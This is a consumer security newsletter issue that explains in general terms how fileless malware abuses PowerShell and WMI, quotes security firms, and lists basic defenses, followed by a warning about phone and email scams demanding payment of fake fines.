Undetectable Fileless Malware Threatens Businesses and Consumers

Most security software can’t detect fileless malware attacks, so what can you do?: Internet Scambusters #837

Fileless malware is one of the biggest challenges facing security software vendors — because they can’t detect it.

Right now, it’s a growing threat to businesses but consumers could be next in the scammers’ sights.

So, what is fileless malware and is there anything you can do to protect your PC from infection? We have some answers for you in this week’s issue.

Let’s get started…


Undetectable Fileless Malware Threatens Businesses and Consumers


Most malware sneaks onto your computer via files you accidentally download — but watch out now for a growing fileless threat!

Traditional malware files that hook onto you via emails and infected websites have to be downloaded onto your hard drive and then be activated in some way to do their dastardly deeds.

But that is so last year.

In the never-ending pursuit of cleverer software, hackers and scammers have developed packages of computer code that simply sit in a computer’s RAM (random access memory), enabling them to evade detection.

According to Internet security specialists Malwarebytes, this form of attack makes it nearly impossible for antivirus signatures to trigger a detection.

In some cases, the only way for computer security firms to identify them is to catch them in the act — that is, while they’re in RAM. After you switch off your computer, your RAM memory is cleared.

“This is one of the biggest challenges when dealing with fileless malware,” the company admits.

Another security expert, Fred O’Connor at Cybereason, echoes their concerns: “The fact that traditional malware isn’t used is an important point. This means that there’s no signature for antivirus software to detect, greatly decreasing the effectiveness of these programs in detecting fileless malware attacks.”

Fileless malware is not new but current versions are way more advanced than older ones. The kits that enable crooks to use them are also now being distributed more widely than they were a few years ago.

How it Works

In very simple terms, fileless malware infects components of Windows that are loaded into memory when you start your computer, notably, for the technically minded, the Windows Power Shell.

It manipulates these components to do its bidding.

“Using legitimate programs makes these attacks nearly undetectable by most security programs and even skilled security analysts,” says O’Connor. “The reason is simple: (these components) are legitimate programs, any command they execute is assumed to also be legitimate.”

How does your computer get infected?

Well, by pretty much the same tactics as with traditional malware, like spam emails and dubious websites. The difference is that you may not be able to control what happens next.

Say, for example, you want to watch a video that uses a doctored version of the Adobe Flash player. As soon as the player starts to run, it instructs the PC to download the malware, which stays in memory while it scours the computer for confidential information. Then it sends that data back to its creator.

“Does that mean traditional anti-virus suites are useless in detecting this new type of computer takeover?” asks another online security specialist, Tripwire.

“Yep, that’s exactly what it means.”

There’s a good chance that once the memory components are compromised, a crook can sit there undetected for however long they like, pilfering data at their convenience.

The good news, if you can call it that, is that fileless malware is currently being used mainly to target businesses rather than individuals — and they should know (or find out if they don’t) how to disable the Power Shell and another component called Windows Management Instrumentation (WMI).

This, however, is not something home users should try to do unless they have a good degree of expertise. Savvy experts can also disable mini-programs known as macros that run inside software like Microsoft Office.

Standard Defenses

For companies too, specialist security services offer expensive monitoring and detection. For the rest of us, the standard defenses apply:

  • Don’t visit dubious websites.
  • Don’t click on links in emails.
  • Keep all your software, including Internet security programs, updated.
  • Password protect all files containing confidential data.
  • Monitor bank, credit card, and store sites for signs that someone is using your ID.

In the meantime, we must hope that Internet security firms develop software to always check on the targeted Windows components, if it doesn’t already do so.

Then, as they identify versions of this fileless malware, they’ll be able to hunt for it.

Microsoft, for example, recently announced it had developed tools to detect two major fileless malware code scripts — but there are likely scores or even hundreds of these in circulation. They have to be identified and neutralized one script at a time.

Expect to hear more about fileless malware in the coming year.

Alert of the Week

The early days of the New Year are a favorite time for crooks to step up their unpaid fines scam. They claim to be police, “clearing up” arrest warrants, and demand immediate payment either via money-wire or gift cards.

Ignore these demands and threats, which arrive by phone or email. If you have concerns (or an unpaid fine) call your local police department. And note: Outstanding fines are required to be paid by check, cash, or, sometimes credit cards, not untraceable gift cards or money wire services.

That’s it for today — we hope you enjoy your week!